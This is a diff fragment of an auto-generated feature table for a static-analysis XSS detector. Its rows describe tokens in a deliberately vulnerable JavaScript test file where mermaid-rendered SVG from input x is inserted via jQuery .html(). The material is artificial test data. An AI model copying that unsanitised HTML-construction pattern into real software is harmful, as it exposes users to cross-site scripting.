autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | $("#foo ... d", x)) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | $("#foo ... d", x)) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | $("#foo ... d", x)) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | exceptional return of $("#foo ... d", x)) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | exceptional return of $("#foo ... d", x)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | exceptional return of $("#foo ... d", x)) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | exceptional return of $("#foo ... d", x)) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:5:109:43 | exceptional return of $("#foo ... d", x)) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:7:109:12 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:7:109:12 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:7:109:12 | "#foo" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23518,6 +153917,26 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:7:109:12 | "#foo" | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:7:109:12 | "#foo" | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:7:109:12 | "#foo" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:15:109:18 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:15:109:18 | html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:15:109:18 | html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:15:109:18 | html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:15:109:18 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:26 | mermaid | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:26 | mermaid | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:26 | mermaid | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:26 | mermaid | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:26 | mermaid | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:33 | mermaid.render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:33 | mermaid.render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:33 | mermaid.render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:33 | mermaid.render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:33 | mermaid.render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | exceptional return of mermaid ... id", x) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | exceptional return of mermaid ... id", x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | exceptional return of mermaid ... id", x) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | exceptional return of mermaid ... id", x) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | exceptional return of mermaid ... id", x) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | mermaid ... id", x) | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | mermaid ... id", x) | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | mermaid ... id", x) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23525,6 +153944,11 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | mermaid ... id", x) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | mermaid ... id", x) | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:20:109:42 | mermaid ... id", x) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:28:109:33 | render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:28:109:33 | render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:28:109:33 | render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:28:109:33 | render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:28:109:33 | render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:35:109:38 | "id" | CalleeFlexibleAccessPath | mermaid.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:35:109:38 | "id" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:35:109:38 | "id" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23541,6 +153965,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:41:109:41 | x | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:41:109:41 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:109:41:109:41 | x | receiverName | mermaid | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:11 | mermaid | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:11 | mermaid | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:11 | mermaid | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:11 | mermaid | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:11 | mermaid | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:22 | mermaid.mermaidAPI | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:22 | mermaid.mermaidAPI | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:22 | mermaid.mermaidAPI | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:22 | mermaid.mermaidAPI | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:22 | mermaid.mermaidAPI | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:29 | mermaid ... .render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:29 | mermaid ... .render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:29 | mermaid ... .render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:29 | mermaid ... .render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:111:29 | mermaid ... .render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | exceptional return of mermaid ... \\n }) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | exceptional return of mermaid ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | exceptional return of mermaid ... \\n }) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | exceptional return of mermaid ... \\n }) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | exceptional return of mermaid ... \\n }) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | mermaid ... \\n }) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | mermaid ... \\n }) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | mermaid ... \\n }) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | mermaid ... \\n }) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:5:113:6 | mermaid ... \\n }) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:13:111:22 | mermaidAPI | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:13:111:22 | mermaidAPI | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:13:111:22 | mermaidAPI | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:13:111:22 | mermaidAPI | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:13:111:22 | mermaidAPI | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:24:111:29 | render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:24:111:29 | render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:24:111:29 | render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:24:111:29 | render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:24:111:29 | render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:31:111:34 | "id" | CalleeFlexibleAccessPath | mermaid.mermaidAPI.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:31:111:34 | "id" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:31:111:34 | "id" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23555,6 +154014,21 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:37:111:37 | x | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:37:111:37 | x | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:37:111:37 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:111:39 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:111:39 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:111:39 | this | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:111:39 | this | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:111:39 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | 'arguments' object of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | 'arguments' object of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | exceptional return of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | exceptional return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | mermaid.mermaidAPI.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | functio ... ;\\n } | InputArgumentIndex | 2 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | functio ... ;\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23562,6 +154036,51 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | functio ... ;\\n } | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | functio ... ;\\n } | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | functio ... ;\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | return of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:40:113:5 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:111:50:111:52 | svg | contextFunctionInterfaces | 